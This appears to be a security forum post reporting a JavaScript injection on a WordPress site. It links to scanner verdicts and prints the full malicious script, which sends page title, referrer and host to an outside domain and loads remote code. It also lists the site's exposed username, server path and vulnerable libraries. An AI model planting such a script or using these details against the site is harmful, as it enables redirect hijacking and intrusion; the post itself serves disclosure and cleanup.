Read on this malware: http://istartblogging.com/wordpress-malware-fix-organic-traffic-redirect-hack/
See: https://www.virustotal.com/en/url/d6bdec5fab4419806fd590d1af0ade061ed8c04cb01f0a48130cf5e11943dda4/analysis/1454685539/
See: https://www.virustotal.com/en/file/dadf09ed44e7fb92f8012e217b933997bdeede70a3c7250474e8364c53353aea/analysis/1454627267/ Avast detects this as JS:Injection-A [Trj]
Detected; Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "hxtp://diehardhockey.ca/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Web application details:
Application: WordPress 4.4.2 - http://www.wordpress.org
Web application version:
WordPress version: WordPress 4.4.2
Wordpress version from source: 4.4.2
WordPress theme: -http://deskcred.com/wp-content/themes/layerswp/
Wordpress internal path: /home3/creasy54/public_html/deskcred.com/wp-content/themes/layerswp/index.php
Warning User Enumeration is possible - ID User Login
1 christof christof
Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.
/wp-content/uploads/ enabled
Detected libraries:
jquery-migrate - 1.2.1 : -http://deskcred.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.3 : (active1) -http://deskcred.com/wp-includes/js/jquery/jquery.js?ver=1.11.3
(active) - the library was also found to be active by running code
1 vulnerable library detected
Here the malware is completely mised: http://zulu.zscaler.com/submission/show/1ac59173a0be96180263595b5301a757-1454685662
polonus